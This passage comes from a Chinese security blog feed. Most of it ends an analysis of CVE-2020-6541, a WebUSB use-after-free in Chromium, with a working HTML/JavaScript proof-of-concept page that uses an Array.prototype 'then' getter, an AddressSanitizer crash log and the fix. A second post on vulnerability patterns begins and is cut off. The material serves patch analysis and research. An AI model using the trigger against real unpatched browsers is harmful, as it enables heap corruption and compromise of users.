class="keyword">else</span> &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 注意这里的then</span></span></span><br><span class="line"><span class="language-javascript">                navigator.<span class="property">usb</span>.<span class="title function_">getDevices</span>().<span class="title function_">then</span>(<span class="function">() =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">                    navigator.<span class="property">usb</span>.<span class="title function_">getDevices</span>();</span></span><br><span class="line"><span class="language-javascript">                &#125;);</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">close</span>();</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">&quot;poc()&quot;</span>&gt;</span> <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure><p>但我们可以转换一个方向：由于<code>OnServiceConnectionError</code>函数中执行的<code>Resolve</code>函数，所传入的值为<code>HeapVector&lt;Member&lt;USBDevice&gt;&gt;(0)</code>。因此在JS层面中，返回的是一个空数组<code>Array(0)</code>。</p><p>我们可以利用JS中的<code>Array.prototype.__defineGetter__()</code> API来设置回调函数。</p><blockquote><p><code>__defineGetter__</code> 方法可以将一个函数绑定在当前对象的指定属性上，<strong>当那个属性的值被读取时，你所绑定的函数就会被调用。</strong> - <a href="https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/Object/__defineGetter__">MDN</a></p></blockquote><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="title class_">Array</span>.<span class="property"><span class="keyword">prototype</span></span>.<span class="title function_">__defineGetter__</span>(<span class="string">&#x27;then&#x27;</span>, <span class="function">() =&gt;</span> &#123;</span><br><span class="line">    navigator.<span class="property">usb</span>.<span class="title function_">getDevices</span>();</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure><p>这样，当<code>OnServiceConnectionError</code>函数返回一个Array时，即可调用我们所设置的JS代码。</p><p>如此，最终便可以得到我们的POC代码。</p><h4 id="c-最终POC代码">c. 最终POC代码</h4><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">function</span> <span class="title function_">poc</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">if</span> (!location.<span class="property">hash</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">open</span>(location.<span class="property">href</span> + <span class="string">&#x27;#second&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">            &#125; <span class="keyword">else</span> &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="title class_">Array</span>.<span class="property"><span class="keyword">prototype</span></span>.<span class="title function_">__defineGetter__</span>(<span class="string">&#x27;then&#x27;</span>, <span class="function">() =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">                    navigator.<span class="property">usb</span>.<span class="title function_">getDevices</span>();</span></span><br><span class="line"><span class="language-javascript">                &#125;);</span></span><br><span class="line"><span class="language-javascript">                navigator.<span class="property">usb</span>.<span class="title function_">getDevices</span>();</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">close</span>();</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">&quot;poc()&quot;</span>&gt;</span> <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure><p>漏洞提交者的asan log如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line">=================================================================</span><br><span class="line">==<span class="number">1</span>==ERROR: AddressSanitizer: use-after-poison on address <span class="number">0x7ec19e552e28</span> at pc <span class="number">0x7fd471762cee</span> bp <span class="number">0x7fffc32b2290</span> sp <span class="number">0x7fffc32b2288</span></span><br><span class="line">READ of size <span class="number">8</span> at <span class="number">0x7ec19e552e28</span> thread <span class="built_in">T0</span> (chrome)</span><br><span class="line">    #<span class="number">0</span> <span class="number">0x7fd471762ced</span> in blink::MemberBase&lt;blink::ScriptPromiseResolver, (blink::TracenessMemberConfiguration)<span class="number">0</span>&gt;::<span class="built_in">GetRaw</span>() <span class="type">const</span> ./../../third_party/blink/renderer/platform/heap/member.h:<span class="number">250</span>:<span class="number">44</span></span><br><span class="line">    #<span class="number">1</span> <span class="number">0x7fd471762ced</span> in blink::MemberBase&lt;blink::ScriptPromiseResolver, (blink::TracenessMemberConfiguration)<span class="number">0</span>&gt;::<span class="built_in">Get</span>() <span class="type">const</span> ./../../third_party/blink/renderer/platform/heap/member.h:<span class="number">188</span>:<span class="number">27</span></span><br><span class="line">    #<span class="number">2</span> <span class="number">0x7fd471762ced</span> in <span class="type">bool</span> blink::<span class="keyword">operator</span>==&lt;blink::ScriptPromiseResolver, blink::ScriptPromiseResolver&gt;(blink::Member&lt;blink::ScriptPromiseResolver&gt; <span class="type">const</span>&amp;, blink::Member&lt;blink::ScriptPromiseResolver&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/heap/persistent.h:<span class="number">826</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">3</span> <span class="number">0x7fd471762ced</span> in <span class="type">bool</span> WTF::HashTraitsEmptyValueChecker&lt;WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, <span class="literal">false</span>&gt;::IsEmptyValue&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;(blink::Member&lt;blink::ScriptPromiseResolver&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_traits.h:<span class="number">350</span>:<span class="number">18</span></span><br><span class="line">    #<span class="number">4</span> <span class="number">0x7fd471762ced</span> in <span class="type">bool</span> WTF::IsHashTraitsEmptyValue&lt;WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;(blink::Member&lt;blink::ScriptPromiseResolver&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_traits.h:<span class="number">355</span>:<span class="number">10</span></span><br><span class="line">    #<span class="number">5</span> <span class="number">0x7fd471762ced</span> in WTF::HashTableHelper&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt;, WTF::IdentityExtractor, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt; &gt;::<span class="built_in">IsEmptyBucket</span>(blink::Member&lt;blink::ScriptPromiseResolver&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">666</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">6</span> <span class="number">0x7fd471762ced</span> in WTF::HashTableHelper&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt;, WTF::IdentityExtractor, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt; &gt;::<span class="built_in">IsEmptyOrDeletedBucket</span>(blink::Member&lt;blink::ScriptPromiseResolver&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">673</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">7</span> <span class="number">0x7fd471762ced</span> in WTF::HashTable&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt;, blink::Member&lt;blink::ScriptPromiseResolver&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::ScriptPromiseResolver&gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, blink::HeapAllocator&gt;::<span class="built_in">IsEmptyOrDeletedBucket</span>(blink::Member&lt;blink::ScriptPromiseResolver&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">841</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">8</span> <span class="number">0x7fd471762ced</span> in WTF::HashTableConstIterator&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt;, blink::Member&lt;blink::ScriptPromiseResolver&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::ScriptPromiseResolver&gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, blink::HeapAllocator&gt;::<span class="built_in">SkipEmptyBuckets</span>() ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">296</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">9</span> <span class="number">0x7fd471762ced</span> in WTF::HashTableConstIterator&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt;, blink::Member&lt;blink::ScriptPromiseResolver&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::ScriptPromiseResolver&gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, blink::HeapAllocator&gt;::<span class="keyword">operator</span>++() ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">373</span>:<span class="number">5</span></span><br><span class="line">    #<span class="number">10</span> <span class="number">0x7fd471762ced</span> in WTF::HashTableConstIteratorAdapter&lt;WTF::HashTable&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt;, blink::Member&lt;blink::ScriptPromiseResolver&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::ScriptPromiseResolver&gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, blink::HeapAllocator&gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt; &gt;::<span class="keyword">operator</span>++() ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">2242</span>:<span class="number">5</span></span><br><span class="line">    #<span class="number">11</span> <span class="number">0x7fd471762ced</span> in blink::USB::<span class="built_in">OnServiceConnectionError</span>() ./../../third_party/blink/renderer/modules/webusb/usb.cc:<span class="number">252</span>:<span class="number">40</span></span><br><span class="line">    #<span class="number">12</span> <span class="number">0x7fd4a239793e</span> in base::OnceCallback&lt;<span class="built_in">void</span> ()&gt;::<span class="built_in">Run</span>() &amp;&amp; ./../../base/callback.h:<span class="number">99</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">13</span> <span class="number">0x7fd4a239793e</span> in mojo::InterfaceEndpointClient::<span class="built_in">NotifyError</span>(base::Optional&lt;mojo::DisconnectReason&gt; <span class="type">const</span>&amp;) ./../../mojo/<span class="keyword">public</span>/cpp/bindings/lib/interface_endpoint_client.cc:<span class="number">376</span>:<span class="number">31</span></span><br><span class="line">    #<span class="number">14</span> <span class="number">0x7fd4a23accaf</span> in mojo::internal::MultiplexRouter::<span class="built_in">ProcessNotifyErrorTask</span>(mojo::internal::MultiplexRouter::Task*, mojo::internal::MultiplexRouter::ClientCallBehavior, base::SequencedTaskRunner*) ./../../mojo/<span class="keyword">public</span>/cpp/bindings/lib/multiplex_router.cc:<span class="number">873</span>:<span class="number">13</span></span><br><span class="line">    #<span class="number">15</span> <span class="number">0x7fd4a23a6e92</span> in mojo::internal::MultiplexRouter::<span class="built_in">ProcessTasks</span>(mojo::internal::MultiplexRouter::ClientCallBehavior, base::SequencedTaskRunner*) ./../../mojo/<span class="keyword">public</span>/cpp/bindings/lib/multiplex_router.cc:<span class="number">786</span>:<span class="number">15</span></span><br><span class="line">    #<span class="number">16</span> <span class="number">0x7fd4a23a2ad5</span> in mojo::internal::MultiplexRouter::<span class="built_in">OnPipeConnectionError</span>(<span class="type">bool</span>) ./../../mojo/<span class="keyword">public</span>/cpp/bindings/lib/multiplex_router.cc:<span class="number">729</span>:<span class="number">3</span></span><br><span class="line">    #<span class="number">17</span> <span class="number">0x7fd4a238653e</span> in base::OnceCallback&lt;<span class="built_in">void</span> ()&gt;::<span class="built_in">Run</span>() &amp;&amp; ./../../base/callback.h:<span class="number">99</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">18</span> <span class="number">0x7fd4a238653e</span> in mojo::Connector::<span class="built_in">HandleError</span>(<span class="type">bool</span>, <span class="type">bool</span>) ./../../mojo/<span class="keyword">public</span>/cpp/bindings/lib/connector.cc:<span class="number">635</span>:<span class="number">44</span></span><br><span class="line">    #<span class="number">19</span> <span class="number">0x7fd4a230e3d4</span> in base::RepeatingCallback&lt;<span class="built_in">void</span> (<span class="type">unsigned</span> <span class="type">int</span>, mojo::HandleSignalsState <span class="type">const</span>&amp;)&gt;::<span class="built_in">Run</span>(<span class="type">unsigned</span> <span class="type">int</span>, mojo::HandleSignalsState <span class="type">const</span>&amp;) <span class="type">const</span> &amp; ./../../base/callback.h:<span class="number">133</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">20</span> <span class="number">0x7fd4a230e3d4</span> in mojo::SimpleWatcher::<span class="built_in">OnHandleReady</span>(<span class="type">int</span>, <span class="type">unsigned</span> <span class="type">int</span>, mojo::HandleSignalsState <span class="type">const</span>&amp;) ./../../mojo/<span class="keyword">public</span>/cpp/system/simple_watcher.cc:<span class="number">292</span>:<span class="number">14</span></span><br><span class="line">    #<span class="number">21</span> <span class="number">0x7fd4a32928f7</span> in base::OnceCallback&lt;<span class="built_in">void</span> ()&gt;::<span class="built_in">Run</span>() &amp;&amp; ./../../base/callback.h:<span class="number">99</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">22</span> <span class="number">0x7fd4a32928f7</span> in base::TaskAnnotator::<span class="built_in">RunTask</span>(<span class="type">char</span> <span class="type">const</span>*, base::PendingTask*) ./../../base/task/common/task_annotator.cc:<span class="number">142</span>:<span class="number">33</span></span><br><span class="line">    #<span class="number">23</span> <span class="number">0x7fd4a32d20ca</span> in base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::<span class="built_in">DoWorkImpl</span>(base::sequence_manager::LazyNow*) ./../../base/task/sequence_manager/thread_controller_with_message_pump_impl.cc:<span class="number">333</span>:<span class="number">23</span></span><br><span class="line">    #<span class="number">24</span> <span class="number">0x7fd4a32d19ec</span> in base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::<span class="built_in">DoWork</span>() ./../../base/task/sequence_manager/thread_controller_with_message_pump_impl.cc:<span class="number">253</span>:<span class="number">36</span></span><br><span class="line">    #<span class="number">25</span> <span class="number">0x7fd4a318bded</span> in base::MessagePumpDefault::<span class="built_in">Run</span>(base::MessagePump::Delegate*) ./../../base/message_loop/message_pump_default.cc:<span class="number">39</span>:<span class="number">55</span></span><br><span class="line">    #<span class="number">26</span> <span class="number">0x7fd4a32d3332</span> in base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::<span class="built_in">Run</span>(<span class="type">bool</span>, base::TimeDelta) ./../../base/task/sequence_manager/thread_controller_with_message_pump_impl.cc:<span class="number">452</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">27</span> <span class="number">0x7fd4a3228f7a</span> in base::RunLoop::<span class="built_in">Run</span>() ./../../base/run_loop.cc:<span class="number">124</span>:<span class="number">14</span></span><br><span class="line">    #<span class="number">28</span> <span class="number">0x7fd49b59f386</span> in content::<span class="built_in">RendererMain</span>(content::MainFunctionParams <span class="type">const</span>&amp;) ./../../content/renderer/renderer_main.cc:<span class="number">230</span>:<span class="number">16</span></span><br><span class="line">    #<span class="number">29</span> <span class="number">0x7fd49b939cbe</span> in content::<span class="built_in">RunZygote</span>(content::ContentMainDelegate*) ./../../content/app/content_main_runner_impl.cc:<span class="number">502</span>:<span class="number">14</span></span><br><span class="line">    #<span class="number">30</span> <span class="number">0x7fd49b93d218</span> in content::ContentMainRunnerImpl::<span class="built_in">Run</span>(<span class="type">bool</span>) ./../../content/app/content_main_runner_impl.cc:<span class="number">882</span>:<span class="number">10</span></span><br><span class="line">    #<span class="number">31</span> <span class="number">0x7fd4a3542976</span> in service_manager::<span class="built_in">Main</span>(service_manager::MainParams <span class="type">const</span>&amp;) ./../../services/service_manager/embedder/main.cc:<span class="number">453</span>:<span class="number">29</span></span><br><span class="line">    #<span class="number">32</span> <span class="number">0x7fd49b93812f</span> in content::<span class="built_in">ContentMain</span>(content::ContentMainParams <span class="type">const</span>&amp;) ./../../content/app/content_main.cc:<span class="number">19</span>:<span class="number">10</span></span><br><span class="line">    #<span class="number">33</span> <span class="number">0x55c339598713</span> in ChromeMain ./../../chrome/app/chrome_main.cc:<span class="number">117</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">34</span> <span class="number">0x7fd46bb86e0a</span> in __libc_start_main /build/glibc-M65Gwz/glibc<span class="number">-2.30</span>/csu/../csu/libc-start.c:<span class="number">308</span>:<span class="number">16</span></span><br><span class="line"></span><br><span class="line">Address <span class="number">0x7ec19e552e28</span> is a wild pointer.</span><br><span class="line">SUMMARY: AddressSanitizer: use-after-<span class="built_in">poison</span> (/chromium/src/out/release_asan/libblink_modules.so<span class="number">+0x26b4ced</span>)</span><br><span class="line">Shadow bytes around the buggy address:</span><br><span class="line">  <span class="number">0x0fd8b3ca2570</span>: <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fd8b3ca2580</span>: <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fd8b3ca2590</span>: <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fd8b3ca25a0</span>: <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fd8b3ca25b0</span>: <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">=&gt;<span class="number">0x0fd8b3ca25c0</span>: <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> f7 f7[f7]f7 <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fd8b3ca25d0</span>: <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fd8b3ca25e0</span>: <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> f7 f7 f7 f7 <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fd8b3ca25f0</span>: <span class="number">00</span> f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">  <span class="number">0x0fd8b3ca2600</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">  <span class="number">0x0fd8b3ca2610</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">Shadow byte <span class="built_in">legend</span> (one shadow byte represents <span class="number">8</span> application bytes):</span><br><span class="line">  Addressable:           <span class="number">00</span></span><br><span class="line">  Partially addressable: <span class="number">01</span> <span class="number">02</span> <span class="number">03</span> <span class="number">04</span> <span class="number">05</span> <span class="number">06</span> <span class="number">07</span></span><br><span class="line">  Heap left redzone:       fa</span><br><span class="line">  Freed heap region:       fd</span><br><span class="line">  Stack left redzone:      f1</span><br><span class="line">  Stack mid redzone:       f2</span><br><span class="line">  Stack right redzone:     f3</span><br><span class="line">  Stack after <span class="keyword">return</span>:      f5</span><br><span class="line">  Stack use after scope:   f8</span><br><span class="line">  Global redzone:          f9</span><br><span class="line">  Global init order:       f6</span><br><span class="line">  Poisoned by user:        f7</span><br><span class="line">  Container overflow:      fc</span><br><span class="line">  Array cookie:            ac</span><br><span class="line">  Intra object redzone:    bb</span><br><span class="line">  ASan internal:           fe</span><br><span class="line">  Left alloca redzone:     ca</span><br><span class="line">  Right alloca redzone:    cb</span><br><span class="line">  Shadow gap:              cc</span><br><span class="line">==<span class="number">1</span>==ABORTING</span><br></pre></td></tr></table></figure><h3 id="3-漏洞补丁">3. 漏洞补丁</h3><p>与之前分析的CVE-2020-6549一样，新的补丁都是在迭代前先将集合复制一份，之后再迭代新复制出的集合。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">USB::OnServiceConnectionError</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  service_.<span class="built_in">reset</span>();</span><br><span class="line">  client_receiver_.<span class="built_in">reset</span>();</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Move the set to a local variable to prevent script execution in Resolve()</span></span><br><span class="line">  <span class="comment">// from invalidating the iterator used by the loop.</span></span><br><span class="line">  HeapHashSet&lt;Member&lt;ScriptPromiseResolver&gt;&gt; get_devices_requests;</span><br><span class="line">  get_devices_requests.<span class="built_in">swap</span>(get_devices_requests_);</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">auto</span>&amp; resolver : get_devices_requests)</span><br><span class="line">    resolver-&gt;<span class="built_in">Resolve</span>(HeapVector&lt;Member&lt;USBDevice&gt;&gt;(<span class="number">0</span>));</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Move the set to a local variable to prevent script execution in Reject()</span></span><br><span class="line">  <span class="comment">// from invalidating the iterator used by the loop.</span></span><br><span class="line">  HeapHashSet&lt;Member&lt;ScriptPromiseResolver&gt;&gt; get_permission_requests;</span><br><span class="line">  get_permission_requests.<span class="built_in">swap</span>(get_permission_requests_);</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">auto</span>&amp; resolver : get_permission_requests) &#123;</span><br><span class="line">    resolver-&gt;<span class="built_in">Reject</span>(<span class="built_in">MakeGarbageCollected</span>&lt;DOMException&gt;(</span><br><span class="line">        DOMExceptionCode::kNotFoundError, kNoDeviceSelected));</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="三、参考">三、参考</h2><ul><li><a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=2068">Issue 2068: Chrome: Use-after-free in USB::OnServiceConnectionError</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;CVE-2020-6541是 Chromium中WebUSB的一个Use-after-free漏洞，在版本84.0.4147.105之前该漏洞允许攻击者通过精心构造的html代码来造成堆破坏。&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    <category term="chrome" scheme="https://kiprey.github.io/categories/vulnerability-analysis/chrome/"/>
    
    
    <category term="chrome" scheme="https://kiprey.github.io/tags/chrome/"/>
    
  </entry>
  
  <entry>
    <title>一些有趣的漏洞模式</title>
    <link href="https://kiprey.github.io/2020/10/vuln-patterns/"/>
    <id>https://kiprey.github.io/2020/10/vuln-patterns/</id>
    <published>2020-10-25T13:54:35.000Z</published>
    <updated>2025-11-24T03:59:40.218Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><ul><li>这里会持续记录平常见到的一些漏洞模式</li></ul><span id="more"></span><h2 id="1-条件竞争">1. 条件竞争</h2><ul><li><p><strong>多线程</strong> 程序中，由于没有及时为资源上锁，而导致该资源被另一个线程所修改时，因为其他的不当操作而造成漏洞。</p></li><li><p>例子：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 多线程代码</span></span><br><span class="line"><span class="keyword">if</span>(ptr)</span><br><span class="line">&#123;</span><br><span class="line">  ...</span><br><span class="line">  <span class="comment">// 注意！user_buf是一块mmap映射的，并且未初始化的区域</span></span><br><span class="line">  <span class="built_in">copy_from_user</span>(ptr,user_buf,len);</span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li>在这个例子中，执行<code>copy_from_user</code>时，由于<code>user_buf</code>只是映射而为分配实际内存，所以当该内存被使用时，会触发内存缺页中断，使CPU执行内存缺页处理程序。此时<code>copy_from_user</code>函数将会暂停执行，等待内存缺页处理程序返回。</li><li>但如果在这个等待的时间中，另一个进程将指针<code>ptr</code>释放，并使某个<strong>重要结构</strong>申请到这块刚刚被释放的内存。则就可以对这个<strong>重要结构</strong>进行修改</li></ul></li></ul><h2 id="2-整数溢出">2. 